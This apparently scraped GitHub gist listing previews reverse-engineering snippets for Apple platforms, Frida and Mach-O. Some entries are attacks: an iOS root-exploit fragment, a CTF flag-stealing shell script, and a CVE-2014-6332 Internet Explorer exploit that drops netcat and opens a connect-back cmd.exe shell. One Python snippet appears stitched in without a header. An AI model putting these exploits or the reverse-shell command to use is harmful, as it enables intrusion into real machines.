@Siguza
Siguza / dsc_syms.c
Last active February 20, 2022 02:19
dyld_shared_cache symbols to r2 flags
// Moved here: https://github.com/Siguza/misc/blob/master/dsc_syms.c
// gets uid 0 (iOS 11)
// add patchfinder and you should be good
// Abraham Masri @cheesecakeufo
/*
* Purpose: iterates over the procs and finds our proc
*/
uint64_t get_our_proc() {
@overtrue
overtrue / KillWeiboDogs.js
Last active June 3, 2020 03:15
KillWeiboDogs
// 1. Open weibo.com in Chrome (make sure you are logged in to Weibo)
// 2. Open the developer tools, paste the code below into the console, and press Enter
// Data source: https://github.com/yu961549745/WeiboBlackList
let dogs = [ 5471246591, 5209943797, 1709070650, 1887921907, 1824515351, 6031549751, 3477430640, 5303365027, 2397004535, 5014141958, 2357033797, 2253196910, 1282371413, 5433169859, 5577097996, 2477460747, 5791757379, 3973075219, 5480191060, 5064046310, 1794010902, 5241254653, 1775613335, 1749775825, 2898929101, 1766122373, 5330205046, 5836217079, 2143736030, 5088125436, 2122838230, 2379528185, 5768433920, 1588830357, 2734746975, 1702267517, 3305446403, 1922854483, 2240459775, 1713064495, 3141318761, 3049734521, 1297708027, 1670201221, 1113091931, 2682353630, 1889031894, 5736617825, 5573535479, 1787098822, 5474940961, 2647495542, 1978558182, 5675487085, 2066669447, 1410124131, 3318338712, 5117947348, 5984813988, 1935760780, 2106405744, 1658278557, 3123751063, 2418980745, 5612086708, 2822792580, 2728966594, 5651704821, 3174983660, 2884830430, 1409910532, 5289026864, 5460203843, 30409
@ThatsJustCheesy
ThatsJustCheesy / HIServicesPrivate_v1.h
Created August 21, 2017 00:39
Private interfaces in HIServices.framework (subframework of ApplicationServices.framework) that message the Dock to set preferences on-the-fly.
// HIServicesPrivate.h v1
// By ThatsJustCheesy
// TO USE THESE INTERFACES, you MUST link against ApplicationServices.framework.
#pragma once
#ifdef __cplusplus
extern "C" {
#endif
@oleavr
oleavr / 00-README.md
Last active April 26, 2024 11:18
Frida devkit examples

frida-gum-example.c

$ clang -Wall -Os -pipe -g3 frida-gum-example.c -o frida-gum-example -L. -lfrida-gum -lresolv -Wl,-dead_strip -Wl,-no_compact_unwind
$ ./frida-gum-example
[*] open("/etc/hosts")
[*] close(3)
[*] open("/etc/fstab")
[*] close(-1)
[*] listener got 4 calls

[*] listener still has 4 calls

@yrp604
yrp604 / xnu-syscall-life-amd64.md
Last active October 2, 2023 15:59
The life of an XNU unix syscall on amd64

XNU syscall path

Chart

             +------------------+
             |These push their  |                                  +-----------------------+
             |respective syscall|                                  |This overwrites the    |
             |dispatch functions|                                  |saved dispatch function|
             |onto the stack    |                                  |with hndl_alltraps     |
@C0deH4cker
C0deH4cker / syms.c
Created March 20, 2016 03:21
Prints out the name, type, and value of every symbol in a Mach-O file, similar to nm.
//
// main.c
// macho-syms
//
// Created by C0deH4cker on 3/19/16.
// Copyright © 2016 C0deH4cker. All rights reserved.
//
#include <stdio.h>
#include <stdlib.h>
@stephenR
stephenR / doit.sh
Last active January 5, 2016 22:34
32c3 vault exploit
#!/bin/sh
echo 'sleep 600' | /tmp/unshare &
sleep 1;
echo 'echo -e "r\n/proc/self/fd/3/vault/flag" | /home/adam/vault_explorer' | /tmp/opendir /proc/$!/root
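def fuzzyfinder(p, l):
    # For each candidate s, record where each character of p first occurs;
    # keep candidates containing every character, sorted by those positions.
    # list() keeps the positions reusable for both the filter and the sort key.
    return map(lambda t: t[0], sorted(filter(lambda t: all(map(lambda x: x != -1, t[1])), map(lambda s: (s, list(map(s.find, p))), l)), key=lambda t: t[1]))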
@worawit
worawit / cve-2014-6332_exploit.html
Last active March 30, 2024 15:02
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the javascript below determine the connect-back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)